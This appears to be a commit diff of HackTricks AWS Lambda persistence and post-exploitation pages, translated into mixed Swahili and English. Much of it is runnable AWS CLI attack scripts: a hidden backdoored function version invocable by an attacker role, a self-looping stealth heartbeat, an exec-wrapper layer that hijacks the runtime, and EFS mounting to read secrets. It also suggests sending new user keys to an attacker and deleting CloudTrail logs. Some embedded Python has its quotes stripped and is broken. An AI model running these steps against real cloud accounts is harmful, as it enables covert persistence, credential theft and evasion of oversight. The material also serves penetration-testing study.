Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-lambd

src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md

@@ -12,7 +12,7 @@ Kwa maelezo zaidi angalia:
 
 ### Lambda Layer Persistence
 
-Inawezekana **kuanzisha/backdoor layer ili kutekeleza msimbo wowote** wakati lambda inatekelezwa kwa njia ya siri:
+Inawezekana **introduce/backdoor a layer to execute arbitrary code** wakati lambda inapotekelezwa kwa njia ya kimyakimya:
 
 {{#ref}}
 aws-lambda-layers-persistence.md
@@ -20,7 +20,7 @@ aws-lambda-layers-persistence.md
 
 ### Lambda Extension Persistence
 
-Kutumia Lambda Layers pia inawezekana kutumia extensions na kudumu katika lambda lakini pia kuiba na kubadilisha maombi.
+Kwa kutumia vibaya Lambda Layers pia inawezekana kutumia extensions na persist ndani ya lambda, pamoja na kuiba na kubadilisha requests.
 
 {{#ref}}
 aws-abusing-lambda-extensions.md
@@ -28,37 +28,64 @@ aws-abusing-lambda-extensions.md
 
 ### Via resource policies
 
-Inawezekana kutoa ufikiaji kwa vitendo tofauti vya lambda (kama vile kuita au kuboresha msimbo) kwa akaunti za nje:
+Inawezekana kutoa access kwa vitendo mbalimbali vya lambda (kama invoke au update code) kwa akaunti za nje:
 
 <figure><img src="../../../../images/image (255).png" alt=""><figcaption></figcaption></figure>
 
 ### Versions, Aliases & Weights
 
-Lambda inaweza kuwa na **matoleo tofauti** (ikiwa na msimbo tofauti kwa kila toleo).\
-Kisha, unaweza kuunda **majina tofauti na matoleo tofauti** ya lambda na kuweka uzito tofauti kwa kila moja.\
-Hivi ndivyo mshambuliaji anaweza kuunda **toleo la backdoored 1** na **toleo la 2 lenye msimbo halali tu** na **kutekeleza toleo la 1 tu katika 1%** ya maombi ili kubaki kwa siri.
+A Lambda inaweza kuwa na **different versions** (kila version ikiwa na code tofauti).\
+Kisha, unaweza kuunda **different aliases with different versions** za lambda na kuweka weights tofauti kwa kila moja.\
+Kwa njia hii mshambulizi anaweza kuunda a **backdoored version 1** na **version 2 yenye code halali tu** na **kuitumia version 1 tu kwa 1%** ya requests ili kubaki kimyakimya.
 
 <figure><img src="../../../../images/image (120).png" alt=""><figcaption></figcaption></figure>
 
 ### Version Backdoor + API Gateway
 
-1. Nakili msimbo wa asili wa Lambda
-2. **Unda toleo jipya la backdooring** msimbo wa asili (au tu na msimbo mbaya). Chapisha na **peleka toleo hilo** kwa $LATEST
-1. Piga simu kwa API gateway inayohusiana na lambda ili kutekeleza msimbo
-3. **Unda toleo jipya lenye msimbo wa asili**, Chapisha na peleka **toleo hilo** kwa $LATEST.
-1. Hii itaficha msimbo wa backdoored katika toleo la awali
-4. Nenda kwa API Gateway na **unda njia mpya ya POST** (au chagua njia nyingine yoyote) ambayo itatekeleza toleo la backdoored la lambda: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
-1. Kumbuka mwisho :1 wa arn **ikiashiria toleo la kazi** (toleo 1 litakuwa la backdoored katika hali hii).
-5. Chagua njia ya POST iliyoundwa na katika Vitendo chagua **`Deploy API`**
-6. Sasa, unapofanya **kuita kazi kupitia POST Backdoor yako** itaitwa
+1. Nakili code ya asili ya Lambda
+2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
+1. Piga API Gateway inayohusiana na lambda ili kuendesha code
+3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
+1. Hii itaficha backdoored code katika toleo la awali
+4. Nenda API Gateway na **create a new POST method** (au chagua method nyingine yoyote) ambayo itaendesha backdoored version ya lambda: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
+1. Kumbuka :1 ya mwisho ya arn **kuonyesha version ya function** (version 1 itakuwa ile iliyopandikizwa katika senario hii).
+5. Chagua POST method uliyoitengeneza na kwenye Actions chagua **`Deploy API`**
+6. Sasa, unapofanya **call the function via POST your Backdoor** itaitwa
 
 ### Cron/Event actuator
 
-Hali kwamba unaweza kufanya **kazi za lambda zifanye kazi wakati kitu kinatokea au wakati muda unapita** inafanya lambda kuwa njia nzuri na ya kawaida ya kupata kudumu na kuepuka kugunduliwa.\
-Hapa kuna mawazo kadhaa ya kufanya **uwepo wako katika AWS uwe wa siri zaidi kwa kuunda lambdas**.
+Uwezo wa kufanya **lambda functions run when something happen or when some time pass** hufanya lambda kuwa njia nzuri na ya kawaida ya kupata persistence na kuepuka ugunduzi.\
+Hapa kuna baadhi ya mawazo ya kufanya **kuwepo kwako katika AWS more stealth by creating lambdas**.
+
+- Kila mara mtumiaji mpya anapotengenezwa, lambda inatengeneza user key mpya na kuipitisha kwa mshambulizi.
+- Kila mara role mpya inapoundwa, lambda inampa compromised users ruhusa za assume role.
+- Kila mara logs mpya za cloudtrail zinapotengenezwa, zifute/zijibadilishe
+
+### RCE abusing AWS_LAMBDA_EXEC_WRAPPER + Lambda Layers
+
+Tumia vibaya environment variable `AWS_LAMBDA_EXEC_WRAPPER` ili kuendesha attacker-controlled wrapper script kabla runtime/handler haianzi. Toa wrapper kupitia Lambda Layer katika `/opt/bin/htwrap`, set `AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap`, kisha invoke function. Wrapper inafanya kazi ndani ya process ya runtime ya function, inarithi function execution role, na hatimaye `exec`s the real runtime hivyo handler ya asili bado inatekelezwa kawaida.
+
+{{#ref}}
+aws-lambda-exec-wrapper-persistence.md
+{{#endref}}
+
+### AWS - Lambda Function URL Public Exposure
+
+Tumia vibaya Lambda asynchronous destinations pamoja na Recursion configuration kufanya function iendelee kujireinvoke bila scheduler wa nje (bila EventBridge, cron, n.k.). Kwa default, Lambda inavunja recursive loops, lakini kuweka recursion config kuwa Allow kunawezesha tena. Destinations hutoa deliver upande wa service kwa async invokes, hivyo invoke moja ya seed huunda channel ya kimyakimya, isiyo na code, ya heartbeat/backdoor. Kwa hiari punguza kwa reserved concurrency ili kupunguza noise.
+
+{{#ref}}
+aws-lambda-async-self-loop-persistence.md
+{{#endref}}
+
+### AWS - Lambda Alias-Scoped Resource Policy Backdoor
+
+Tengeneza hidden Lambda version yenye attacker logic na apply resource-based policy kwa version maalum (au alias) ukitumia parameter `--qualifier` katika `lambda add-permission`. Mpe tu `lambda:InvokeFunction` kwenye `arn:aws:lambda:REGION:ACCT:function:FN:VERSION` kwa attacker principal. Invocation za kawaida kupitia function name au primary alias hazibadiliki, wakati mshambulizi anaweza kuinvoke moja kwa moja backdoored version ARN.
+
+Hii ni ya kimyakimya kuliko kufichua Function URL na haiubadili primary traffic alias.
+
+{{#ref}}
+aws-lambda-alias-version-policy-backdoor.md
+{{#endref}}
 
-- Kila wakati mtumiaji mpya anapoundwa lambda inaunda funguo mpya za mtumiaji na kuzipeleka kwa mshambuliaji.
-- Kila wakati jukumu jipya linapoundwa lambda inatoa ruhusa za kudai jukumu kwa watumiaji waliokumbwa.
-- Kila wakati kumbukumbu mpya za cloudtrail zinapoundwa, futa/badilisha hizo.
 
 {{#include ../../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-alias-version-policy-backdoor.md

@@ -0,0 +1,88 @@
+# AWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Muhtasari
+
+Unda toleo lililofichwa la Lambda lenye logic ya attacker na uweke resource-based policy kwa wigo wa toleo hilo maalum (au alias) ukitumia parameter `--qualifier` katika `lambda add-permission`. Toa tu `lambda:InvokeFunction` kwenye `arn:aws:lambda:REGION:ACCT:function:FN:VERSION` kwa attacker principal. Ita za kawaida kupitia jina la function au alias kuu hazitathiriwa, wakati attacker anaweza kuitisha moja kwa moja version ARN iliyobackdoor.
+
+Hii ni ya kuficha zaidi kuliko kufichua Function URL na haiathiri alias kuu ya trafiki.
+
+## Ruhusa Zinazohitajika (attacker)
+
+- `lambda:UpdateFunctionCode`, `lambda:UpdateFunctionConfiguration`, `lambda:PublishVersion`, `lambda:GetFunctionConfiguration`
+- `lambda:AddPermission` (to add version-scoped resource policy)
+- `iam:CreateRole`, `iam:PutRolePolicy`, `iam:GetRole`, `sts:AssumeRole` (to simulate an attacker principal)
+
+## Attack Steps (CLI)
+
+<details>
+<summary>Chapisha toleo lililofichwa, ongeza ruhusa yenye wigo wa qualifier, ita kama attacker</summary>
+```bash
+# Vars
+REGION=us-east-1
+TARGET_FN=<target-lambda-name>
+
+# [Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., "main") stays on a clean version
+# aws lambda create-alias --function-name "$TARGET_FN" --name main --function-version <clean-version> --region "$REGION"
+
+# 1) Build a small backdoor handler and publish as a new version
+cat > bdoor.py <<PY
+import json, os, boto3
+
+def lambda_handler(e, c):
+ident = boto3.client(sts).get_caller_identity()
+return {"ht": True, "who": ident, "env": {"fn": os.getenv(AWS_LAMBDA_FUNCTION_NAME)}}
+PY
+zip bdoor.zip bdoor.py
+aws lambda update-function-code --function-name "$TARGET_FN" --zip-file fileb://bdoor.zip --region $REGION
+aws lambda update-function-configuration --function-name "$TARGET_FN" --handler bdoor.lambda_handler --region $REGION
+until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --region $REGION --query LastUpdateStatus --output text)" = "Successful" ]; do sleep 2; done
+VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text)
+VER_ARN=$(aws lambda get-function --function-name "$TARGET_FN:$VER" --region $REGION --query Configuration.FunctionArn --output text)
+echo "Published version: $VER ($VER_ARN)"
+
+# 2) Create an attacker principal and allow only version invocation (same-account simulation)
+ATTACK_ROLE_NAME=ht-version-invoker
+aws iam create-role --role-name $ATTACK_ROLE_NAME --assume-role-policy-document Version:2012-10-17 >/dev/null
+cat > /tmp/invoke-policy.json <<POL
+{
+"Version": "2012-10-17",
+"Statement": [{
+"Effect": "Allow",
+"Action": ["lambda:InvokeFunction"],
+"Resource": ["$VER_ARN"]
+}]
+}
+POL
+aws iam put-role-policy --role-name $ATTACK_ROLE_NAME --policy-name ht-invoke-version --policy-document file:///tmp/invoke-policy.json
+
+# Add resource-based policy scoped to the version (Qualifier)
+aws lambda add-permission \
+--function-name "$TARGET_FN" \
+--qualifier "$VER" \
+--statement-id ht-version-backdoor \
+--action lambda:InvokeFunction \
+--principal arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME \
+--region $REGION
+
+# 3) Assume the attacker role and invoke only the qualified version
+ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME
+CREDS=$(aws sts assume-role --role-arn "$ATTACK_ROLE_ARN" --role-session-name htInvoke --query Credentials --output json)
+export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId)
+export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey)
+export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken)
+aws lambda invoke --function-name "$VER_ARN" /tmp/ver-out.json --region $REGION >/dev/null
+cat /tmp/ver-out.json
+
+# 4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role
+aws lambda remove-permission --function-name "$TARGET_FN" --statement-id ht-version-backdoor --qualifier "$VER" --region $REGION || true
+```
+</details>
+
+## Athari
+
+- Hutoa backdoor ya siri ili kuwaita toleo lililofichwa la function bila kubadilisha alias kuu au kufichua Function URL.
+- Inapunguza mfichuko kwa tu toleo/alias iliyobainishwa kupitia resource-based policy `Qualifier`, ikipunguza eneo la kugundua huku ikidumisha uwezo thabiti wa kuitwa kwa attacker principal.
+
+{{#include ../../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-async-self-loop-persistence.md

@@ -0,0 +1,92 @@
+# AWS - Lambda Async Self-Loop Persistence via Destinations + Recursion Allow
+
+Matumizi mabaya ya Destinations asynchronous za Lambda pamoja na usanidi wa Recursion ili kufanya function ijirudishe-invoke kila mara bila mscheduler wa nje (hakuna EventBridge, cron, n.k.). Kwa default, Lambda inavunja loop za recursion, lakini kuweka recursion config kwa Allow kunaziwezesha tena. Destinations hufanya delivery upande wa service kwa async invokes, hivyo invoke moja ya kuanzisha inaunda chaneli ya heartbeat/backdoor isiyo na msimbo na ya siri. Kwa hiari fupisha kwa reserved concurrency ili kupunguza kelele.
+
+Vidokezo
+- Lambda haiwezi kuruhusu kusanidi function kuwa destination yake moja kwa moja. Tumia function alias kama destination na ruhusu execution role kui-invoke alias hiyo.
+- Ruhusa za chini kabisa: uwezo wa kusoma/kusasisha event invoke config na recursion config za function lengwa, kuchapisha version na kusimamia alias, na kusasisha policy ya execution role ya function ili kuruhusu lambda:InvokeFunction kwenye alias.
+
+## Mahitaji
+- Region: us-east-1
+- Vars:
+- REGION=us-east-1
+- TARGET_FN=<target-lambda-name>
+
+## Hatua
+
+1) Pata function ARN na usanidi wa recursion wa sasa
+```
+FN_ARN=$(aws lambda get-function --function-name "$TARGET_FN" --region $REGION --query Configuration.FunctionArn --output text)
+aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION || true
+```
+2) Chapisha toleo na unda/sasisha alias (inayotumika kama destinisho la mwenyewe)
+```
+VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text)
+if ! aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION >/dev/null 2>&1; then
+aws lambda create-alias --function-name "$TARGET_FN" --name loop --function-version "$VER" --region $REGION
+else
+aws lambda update-alias --function-name "$TARGET_FN" --name loop --function-version "$VER" --region $REGION
+fi
+ALIAS_ARN=$(aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION --query AliasArn --output text)
+```
+3) Ruhusu function execution role kuitisha alias (inahitajika na Lambda Destinations→Lambda)
+```
+# Set this to the execution role name used by the target function
+ROLE_NAME=<lambda-execution-role-name>
+cat > /tmp/invoke-self-policy.json <<EOF
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": "lambda:InvokeFunction",
+"Resource": "${ALIAS_ARN}"
+}
+]
+}
+EOF
+aws iam put-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --policy-document file:///tmp/invoke-self-policy.json --region $REGION
+```
+4) Sanidi async destination kwa alias (self via alias) na uzime retries
+```
+aws lambda put-function-event-invoke-config \
+--function-name "$TARGET_FN" \
+--destination-config OnSuccess={Destination=$ALIAS_ARN} \
+--maximum-retry-attempts 0 \
+--region $REGION
+
+# Verify
+aws lambda get-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION --query DestinationConfig
+```
+5) Ruhusu mizunguko ya rekursivu
+```
+aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Allow --region $REGION
+aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION
+```
+6) Chochea invoke moja asynchronous
+```
+aws lambda invoke --function-name "$TARGET_FN" --invocation-type Event /tmp/seed.json --region $REGION >/dev/null
+```
+7) Angalia miito zinazoendelea (mifano)
+```
+# Recent logs (if the function logs each run)
+aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 20 --region $REGION --query events[].timestamp --output text
+# or check CloudWatch Metrics for Invocations increasing
+```
+8) Hiari: stealth throttle
+```
+aws lambda put-function-concurrency --function-name "$TARGET_FN" --reserved-concurrent-executions 1 --region $REGION
+```
+## Usafishaji
+Vunja loop na ondoa persistence.
+```
+aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Terminate --region $REGION
+aws lambda delete-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION || true
+aws lambda delete-function-concurrency --function-name "$TARGET_FN" --region $REGION || true
+# Optional: delete alias and remove the inline policy when finished
+aws lambda delete-alias --function-name "$TARGET_FN" --name loop --region $REGION || true
+ROLE_NAME=<lambda-execution-role-name>
+aws iam delete-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --region $REGION || true
+```
+## Athari
+- Async invoke moja husababisha Lambda kuji-invoke upya kwa uendelevu bila scheduler ya nje, ikiruhusu stealthy persistence/heartbeat. Reserved concurrency inaweza kupunguza kelele hadi warm execution moja.

src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-exec-wrapper-persistence.md

@@ -0,0 +1,94 @@
+# AWS - Lambda Exec Wrapper Layer Hijack (Pre-Handler RCE)
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Muhtasari
+
+Tumia vibaya environment variable `AWS_LAMBDA_EXEC_WRAPPER` ili kutekeleza script ya wrapper inayodhibitiwa na mshambuliaji kabla runtime/handler inaanza. Toa wrapper kupitia Lambda Layer kwenye `/opt/bin/htwrap`, weka `AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap`, kisha uitishe function. Wrapper inaendesha ndani ya mchakato wa runtime wa function, inarithi role ya utekelezaji ya function, na hatimaye hufanya `exec` ya runtime halisi ili handler ya asili bado ifanye kazi kawaida.
+
+> [!WARNING]
+> Mbinu hii inatoa utekelezaji wa code katika Lambda lengwa bila kubadilisha msimbo wa chanzo au role na bila kuhitaji `iam:PassRole`. Unahitaji tu uwezo wa kusasisha function configuration na kuchapisha/kuambatisha layer.
+
+## Idhini Zinazohitajika (mshambuliaji)
+
+- `lambda:UpdateFunctionConfiguration`
+- `lambda:GetFunctionConfiguration`
+- `lambda:InvokeFunction` (or trigger via existing event)
+- `lambda:ListFunctions`, `lambda:ListLayers`
+- `lambda:PublishLayerVersion` (same account) and optionally `lambda:AddLayerVersionPermission` if using a cross-account/public layer
+
+## Wrapper Script
+
+Weka wrapper kwenye `/opt/bin/htwrap` ndani ya layer. Inaweza kuendesha mantiki ya kabla ya handler na lazima itamalize na `exec "$@"` ili kuunganisha na runtime halisi.
+```bash
+#!/bin/bash
+set -euo pipefail
+# Pre-handler actions (runs in runtime process context)
+echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
+python3 - <<'PY'
+import boto3, json, os
+try:
+ident = boto3.client('sts').get_caller_identity()
+print('[ht] sts identity:', json.dumps(ident))
+except Exception as e:
+print('[ht] sts error:', e)
+PY
+# Chain to the real runtime
+exec "$@"
+```
+## Hatua za Shambulio (CLI)
+
+<details>
+<summary>Chapisha layer, ambatisha kwa function lengwa, weka wrapper, itisha</summary>
+```bash
+# Vars
+REGION=us-east-1
+TARGET_FN=<target-lambda-name>
+
+# 1) Package wrapper at /opt/bin/htwrap
+mkdir -p layer/bin
+cat > layer/bin/htwrap <<'WRAP'
+#!/bin/bash
+set -euo pipefail
+echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
+python3 - <<'PY'
+import boto3, json
+print('[ht] sts identity:', __import__('json').dumps(__import__('boto3').client('sts').get_caller_identity()))
+PY
+exec "$@"
+WRAP
+chmod +x layer/bin/htwrap
+(zip -qr htwrap-layer.zip layer)
+
+# 2) Publish the layer
+LAYER_ARN=$(aws lambda publish-layer-version \
+--layer-name ht-exec-wrapper \
+--zip-file fileb://htwrap-layer.zip \
+--compatible-runtimes python3.11 python3.10 python3.9 nodejs20.x nodejs18.x java21 java17 dotnet8 \
+--query LayerVersionArn --output text --region "$REGION")
+
+echo "$LAYER_ARN"
+
+# 3) Attach the layer and set AWS_LAMBDA_EXEC_WRAPPER
+aws lambda update-function-configuration \
+--function-name "$TARGET_FN" \
+--layers "$LAYER_ARN" \
+--environment "Variables={AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap}" \
+--region "$REGION"
+
+# Wait for update to finish
+until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --query LastUpdateStatus --output text --region "$REGION")" = "Successful" ]; do sleep 2; done
+
+# 4) Invoke and verify via CloudWatch Logs
+aws lambda invoke --function-name "$TARGET_FN" /tmp/out.json --region "$REGION" >/dev/null
+aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 50 --region "$REGION" --query 'events[].message' --output text
+```
+</details>
+
+## Impact
+
+- Utekelezaji wa msimbo kabla ya handler katika muktadha wa Lambda runtime kwa kutumia execution role ya function iliyopo.
+- Hakuna mabadiliko yanayohitajika kwa code ya function au role; inafanya kazi katika managed runtimes za kawaida (Python, Node.js, Java, .NET).
+- Inaruhusu persistence, credential access (mfano, STS), data exfiltration, na runtime tampering kabla handler inapoanza.
+
+{{#include ../../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md

@@ -4,21 +4,21 @@
 
 ## Lambda
 
-Kwa maelezo zaidi angalia:
+Kwa taarifa zaidi angalia:
 
 {{#ref}}
 ../../aws-services/aws-lambda-enum.md
 {{#endref}}
 
-### Exfiltrate Lambda Credentials
+### Exfilrtate Lambda Credentials
 
-Lambda inatumia mazingira ya mabadiliko kuingiza akreditif katika wakati wa utekelezaji. Ikiwa unaweza kupata ufikiaji wa hizo (kwa kusoma `/proc/self/environ` au kutumia kazi iliyo hatarini yenyewe), unaweza kuzitumia mwenyewe. Zinapatikana katika majina ya kawaida ya mabadiliko `AWS_SESSION_TOKEN`, `AWS_SECRET_ACCESS_KEY`, na `AWS_ACCESS_KEY_ID`.
+Lambda hutumia vigezo vya mazingira (environment variables) kuingiza credentials wakati wa runtime. Ikiwa unaweza kupata ufikiaji kwao (kwa kusoma `/proc/self/environ` au kwa kutumia function yenye udhaifu yenyewe), unaweza kuzitumia mwenyewe. Zipo katika majina ya kigezo cha default `AWS_SESSION_TOKEN`, `AWS_SECRET_ACCESS_KEY`, na `AWS_ACCESS_KEY_ID`.
 
-Kwa kawaida, hizi zitakuwa na ufikiaji wa kuandika kwenye kundi la kumbukumbu la cloudwatch (jina lake linahifadhiwa katika `AWS_LAMBDA_LOG_GROUP_NAME`), pamoja na kuunda makundi ya kumbukumbu yasiyo na mipaka, hata hivyo kazi za lambda mara nyingi zina ruhusa zaidi zilizotolewa kulingana na matumizi yao yaliyokusudiwa.
+Kwa chaguo-msingi, hizi zitakuwa na uwezo wa kuandika kwenye cloudwatch log group (jina lake limehifadhiwa katika `AWS_LAMBDA_LOG_GROUP_NAME`), pamoja na kuunda log groups yoyote; hata hivyo, Lambda functions mara nyingi zina idhini za ziada zilizotengwa kulingana na matumizi yao yaliyokusudiwa.
 
 ### Steal Others Lambda URL Requests
 
-Ikiwa mshambuliaji kwa namna fulani anafanikiwa kupata RCE ndani ya Lambda atakuwa na uwezo wa kuiba maombi ya HTTP ya watumiaji wengine kwa lambda. Ikiwa maombi yana taarifa nyeti (cookies, akreditif...) atakuwa na uwezo wa kuiba hizo.
+Ikiwa attacker kwa namna fulani anafanikiwa kupata RCE ndani ya Lambda, atakuwa na uwezo wa kuiba HTTP requests za watumiaji wengine kwa Lambda. Iki requests zina taarifa nyeti (cookies, credentials...) atakuwa na uwezo wa kuziiba.
 
 {{#ref}}
 aws-warm-lambda-persistence.md
@@ -26,10 +26,60 @@ aws-warm-lambda-persistence.md
 
 ### Steal Others Lambda URL Requests & Extensions Requests
 
-Kutumia Lambda Layers pia inawezekana kutumia nyongeza na kudumu katika lambda lakini pia kuiba na kubadilisha maombi.
+Kwa kutumia vibaya Lambda Layers pia inawezekana kutumia vibaya extensions na kudumu ndani ya Lambda, pamoja na kuiba na kubadilisha requests.
 
 {{#ref}}
 ../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
 {{#endref}}
 
+### AWS Lambda – VPC Egress Bypass
+
+Lazimisha Lambda function kutoka kwenye VPC iliyozuiwa kwa kusasisha configuration yake kwa VpcConfig tupu (SubnetIds=[], SecurityGroupIds=[]). Function hiyo itaendeshwa kwenye plane ya networking inayosimamiwa na Lambda, ikipata tena uwezo wa kufikia mtandao wa nje na kuepuka controls za egress zinazotekelezwa na private VPC subnets bila NAT.
+
+{{#ref}}
+aws-lambda-vpc-egress-bypass.md
+{{#endref}}
+
+### AWS Lambda – Runtime Pinning/Rollback Abuse
+
+Tumia vibaya `lambda:PutRuntimeManagementConfig` ku-pin function kwa runtime version maalum (Manual) au ku-ifreeze updates (FunctionUpdate). Hii inahifadhi compatibility na malicious layers/wrappers na inaweza kuifanya function ibaki kwenye runtime ya zamani yenye udhaifu ili kusaidia exploitation na persistence ya muda mrefu.
+
+{{#ref}}
+aws-lambda-runtime-pinning-abuse.md
+{{#endref}}
+
+### AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
+
+Tumia vibaya `lambda:UpdateFunctionConfiguration` controls za advanced logging ili kurekebisha logs za function kwenda kwenye CloudWatch Logs log group iliyochaguliwa na mshambuliaji. Hii inafanya kazi bila kubadilisha code au execution role (most Lambda roles tayari zina `logs:CreateLogGroup/CreateLogStream/PutLogEvents` kupitia `AWSLambdaBasicExecutionRole`). Iki function ikachapisha secrets/request bodies au kukatika kwa crash na stack traces, unaweza kuzikusanya kutoka kwenye log group mpya.
+
+{{#ref}}
+aws-lambda-loggingconfig-redirection.md
+{{#endref}}
+
+### AWS - Lambda Function URL Public Exposure
+
+Badilisha private Lambda Function URL kuwa endpoint ya umma isiyothibitishwa kwa kubadilisha Function URL AuthType kuwa NONE na kuambatisha resource-based policy inayowapa kila mtu lambda:InvokeFunctionUrl. Hii inaruhusu anonymous invocation ya internal functions na inaweza kufichua operesheni za backend zenye nyeti.
+
+{{#ref}}
+aws-lambda-function-url-public-exposure.md
+{{#endref}}
+
+### AWS Lambda – Event Source Mapping Target Hijack
+
+Tumia vibaya `UpdateEventSourceMapping` kubadilisha target Lambda function ya Event Source Mapping (ESM) iliyopo ili rekodi kutoka DynamoDB Streams, Kinesis, au SQS ziletwe kwa function inayodhibitiwa na mshambuliaji. Hii inaelekeza data ya moja kwa moja kimya bila kugusa producers au code ya function ya awali.
+
+{{#ref}}
+aws-lambda-event-source-mapping-target-hijack.md
+{{#endref}}
+
+### AWS Lambda – EFS Mount Injection data exfiltration
+
+Tumia vibaya `lambda:UpdateFunctionConfiguration` kuambatisha EFS Access Point iliyopo kwa Lambda, kisha tuma code rahisi inayoorodhesha/ikusoma files kutoka kwenye path iliyopachikwa ili exfiltrate secrets/config zilizoshirikiwa ambazo function haikuweza kufikia hapo awali.
+
+{{#ref}}
+aws-lambda-efs-mount-injection.md
+{{#endref}}
+
+
+
 {{#include ../../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md

@@ -0,0 +1,75 @@
+# AWS Lambda – EFS Mount Injection via UpdateFunctionConfiguration (Data Theft)
+
+Tumia `lambda:UpdateFunctionConfiguration` kuambatanisha EFS Access Point iliyopo kwenye Lambda, kisha wekeza code rahisi inayoorodhesha/inasoma mafaili kutoka kwenye path iliyopangwa ili kutoa sirimu/shughuli za config zilizoshirikiwa ambazo function haikuweza kufikia hapo awali.
+
+## Requirements
+- Ruhusa kwenye akaunti/mwenye mamlaka ya mwathirika:
+- `lambda:GetFunctionConfiguration`
+- `lambda:ListFunctions` (kwa kutafuta functions)
+- `lambda:UpdateFunctionConfiguration`
+- `lambda:UpdateFunctionCode`
+- `lambda:InvokeFunction`
+- `efs:DescribeMountTargets` (kwenye kuthibitisha mount targets zipo)
+- Misingi ya mazingira:
+- Lambda lengwa iko VPC-enabled na subnets/SGs zake zinaweza kufikia EFS mount target SG kupitia TCP/2049 (mfano: role ina AWSLambdaVPCAccessExecutionRole na routing ya VPC inaruhusu).
+- EFS Access Point iko katika VPC ileile na ina mount targets katika AZs za subnets za Lambda.
+
+## Attack
+- Vigezo
+```
+REGION=us-east-1
+TARGET_FN=<target-lambda-name>
+EFS_AP_ARN=<efs-access-point-arn>
+```
+1) Ambatisha EFS Access Point kwenye Lambda
+```
+aws lambda update-function-configuration \
+--function-name $TARGET_FN \
+--file-system-configs Arn=$EFS_AP_ARN,LocalMountPath=/mnt/ht \
+--region $REGION
+# wait until LastUpdateStatus == Successful
+until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
+```
+2) Andika upya code na msomaji rahisi unaoorodhesha faili na kutazama baiti 200 za kwanza za faili inayoweza kuwa siri/config
+```
+cat > reader.py <<PY
+import os, json
+BASE=/mnt/ht
+
+def lambda_handler(e, c):
+out={ls:[],peek:None}
+try:
+for root, dirs, files in os.walk(BASE):
+for f in files:
+p=os.path.join(root,f)
+out[ls].append(p)
+cand = next((p for p in out[ls] if secret in p.lower() or config in p.lower()), None)
+if cand:
+with open(cand,rb) as fh:
+out[peek] = fh.read(200).decode(utf-8,ignore)
+except Exception as ex:
+out[err]=str(ex)
+return out
+PY
+zip reader.zip reader.py
+aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://reader.zip --region $REGION
+# If the original handler was different, set it to reader.lambda_handler
+aws lambda update-function-configuration --function-name $TARGET_FN --handler reader.lambda_handler --region $REGION
+until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
+```
+3) Waita na upate data
+```
+aws lambda invoke --function-name $TARGET_FN /tmp/efs-out.json --region $REGION >/dev/null
+cat /tmp/efs-out.json
+```
+Matokeo yanapaswa kujumuisha orodha ya directory chini ya /mnt/ht na onyesho fupi la faili ya secret/config iliyochaguliwa kutoka EFS.
+
+## Athari
+
